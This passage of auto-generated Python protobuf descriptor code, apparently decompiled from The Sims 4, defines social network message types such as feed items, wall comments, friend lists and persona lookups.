type=None),
descriptor.EnumValueDescriptor(name='SOC_LOGOFF',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_PRESENCEUPDATE',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_FEEDUPDATE',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_ADD_FEEDSUB',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REMOVE_FEEDSUB',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_PRIVOP',
index=6,
number=6,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_QUEUED',
index=7,
number=8,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_CACHE_INVALIDATE',
index=8,
number=9,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REST_USER_REGISTER',
index=9,
number=10,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6856,
serialized_end=7118)
SFI_ITEM_DOWNLOADED = 0
SFI_ITEM_UPLOADED = 1
SFI_ITEM_FAVORITED = 2
SFI_ITEM_COMMENTED = 3
SFI_ITEM_SHOWCASED = 4
SFI_PROFILE_COMMENTED = 5
SFI_NEW_FOLLOWERS = 6
SOC_LOGIN = 0
SOC_LOGOFF = 1
SOC_PRESENCEUPDATE = 2
SOC_FEEDUPDATE = 3
SOC_ADD_FEEDSUB = 4
SOC_REMOVE_FEEDSUB = 5
SOC_BROADCAST_PRIVOP = 6
SOC_BROADCAST_QUEUED = 8
SOC_BROADCAST_CACHE_INVALIDATE = 9
SOC_REST_USER_REGISTER = 10
_SOCIALFRIENDMSG = descriptor.Descriptor(name='SocialFriendMsg',
full_name='EA.Sims4.Network.SocialFriendMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='simId',
full_name='EA.Sims4.Network.SocialFriendMsg.simId',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFriendMsg.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='note',
full_name='EA.Sims4.Network.SocialFriendMsg.note',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialFriendMsg.prefix',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFriendMsg.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cheatForce',
full_name='EA.Sims4.Network.SocialFriendMsg.cheatForce',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=112,
serialized_end=230)
_SOCIALPERSONARESPONSEMSG = descriptor.Descriptor(name='SocialPersonaResponseMsg',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='personas',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg.personas',
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=232,
serialized_end=276)
_SOCIALGENERICRESPONSE = descriptor.Descriptor(name='SocialGenericResponse',
full_name='EA.Sims4.Network.SocialGenericResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='error',
full_name='EA.Sims4.Network.SocialGenericResponse.error',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='msg_type',
full_name='EA.Sims4.Network.SocialGenericResponse.msg_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postId',
full_name='EA.Sims4.Network.SocialGenericResponse.postId',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postParentId',
full_name='EA.Sims4.Network.SocialGenericResponse.postParentId',
index=3,
number=4,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=278,
serialized_end=405)
_SOCIALPLAYERINFOLIST_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='AccountName',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountName',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='AccountNotes',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountNotes',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='presence',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.presence',
index=2,
number=3,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='OnlineStatus2',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.OnlineStatus2',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='NucleusId',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.NucleusId',
index=4,
number=9,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='PlayerBio',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.PlayerBio',
index=5,
number=10,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.exclude_reported',
index=6,
number=11,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='IsUserBlocked',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.IsUserBlocked',
index=7,
number=12,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=501,
serialized_end=724)
_SOCIALPLAYERINFOLIST = descriptor.Descriptor(name='SocialPlayerInfoList',
full_name='EA.Sims4.Network.SocialPlayerInfoList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='players',
full_name='EA.Sims4.Network.SocialPlayerInfoList.players',
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALPLAYERINFOLIST_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=408,
serialized_end=724)
_SOCIALSEARCHMSG = descriptor.Descriptor(name='SocialSearchMsg',
full_name='EA.Sims4.Network.SocialSearchMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialSearchMsg.prefix',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='search_results',
full_name='EA.Sims4.Network.SocialSearchMsg.search_results',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=726,
serialized_end=823)
_ORIGINERRORMESSAGE = descriptor.Descriptor(name='OriginErrorMessage',
full_name='EA.Sims4.Network.OriginErrorMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='errorcode',
full_name='EA.Sims4.Network.OriginErrorMessage.errorcode',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='errormessage',
full_name='EA.Sims4.Network.OriginErrorMessage.errormessage',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=825,
serialized_end=886)
_SOCIALINVITERESPONSEMESSAGE = descriptor.Descriptor(name='SocialInviteResponseMessage',
full_name='EA.Sims4.Network.SocialInviteResponseMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='invitationid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationid',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='invitationtype',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationtype',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.inviternucleusid',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accepternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.accepternucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='actionSuccess',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.actionSuccess',
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=889,
serialized_end=1040)
_SOCIALCASSANDRATEST = descriptor.Descriptor(name='SocialCassandraTest',
full_name='EA.Sims4.Network.SocialCassandraTest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialCassandraTest.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1042,
serialized_end=1116)
_SOCIALFRIENDLISTREQUESTMESSAGE = descriptor.Descriptor(name='SocialFriendListRequestMessage',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='account_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.account_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friend_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.friend_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='address_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.address_str',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='object_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.object_str',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='reply_proxy_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.reply_proxy_id',
index=4,
number=5,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1119,
serialized_end=1255)
_SOCIALREQUESTNUCLEUSIDFROMPERSONA = descriptor.Descriptor(name='SocialRequestNucleusIdFromPersona',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='personaName',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.personaName',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1257,
serialized_end=1352)
_SOCIALNUCLEUSIDFROMPERSONARESPONSE = descriptor.Descriptor(name='SocialNucleusIdFromPersonaResponse',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1354,
serialized_end=1448)
_SOCIALEXCHANGEMESSAGE = descriptor.Descriptor(name='SocialExchangeMessage',
full_name='EA.Sims4.Network.SocialExchangeMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='envelope',
full_name='EA.Sims4.Network.SocialExchangeMessage.envelope',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1450,
serialized_end=1533)
_SOCIALFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialFollowersMessage',
full_name='EA.Sims4.Network.SocialFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='sfim_blob',
full_name='EA.Sims4.Network.SocialFollowersMessage.sfim_blob',
index=0,
number=1,
type=12,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1535,
serialized_end=1578)
_SOCIALFEEDITEMMESSAGE = descriptor.Descriptor(name='SocialFeedItemMessage',
full_name='EA.Sims4.Network.SocialFeedItemMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feed_type',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='metadata',
full_name='EA.Sims4.Network.SocialFeedItemMessage.metadata',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.nucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='quantity',
full_name='EA.Sims4.Network.SocialFeedItemMessage.quantity',
index=5,
number=6,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_nucleusid',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_persona',
index=7,
number=8,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='followers_blob',
full_name='EA.Sims4.Network.SocialFeedItemMessage.followers_blob',
index=8,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='is_maxis_curated',
full_name='EA.Sims4.Network.SocialFeedItemMessage.is_maxis_curated',
index=9,
number=10,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1581,
serialized_end=1928)
_SOCIALFEEDITEMUNSERIALIZEDMESSAGE = descriptor.Descriptor(name='SocialFeedItemUnserializedMessage',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='data',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.data',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='count_override',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.count_override',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1930,
serialized_end=2020)
_SOCIALWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialWallCommentMessage',
full_name='EA.Sims4.Network.SocialWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialWallCommentMessage.uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_id',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_persona',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialWallCommentMessage.message',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2022,
serialized_end=2122)
_SOCIALGETWALLCOMMENTSMESSAGE = descriptor.Descriptor(name='SocialGetWallCommentsMessage',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='starting_uuid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.starting_uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_results',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.num_results',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.messages',
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='hidden',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.hidden',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.exclude_reported',
index=6,
number=7,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2125,
serialized_end=2342)
_SOCIALPOSTWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialPostWallCommentMessage',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.message',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2345,
serialized_end=2475)
_SOCIALDELETEWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialDeleteWallCommentMessage',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
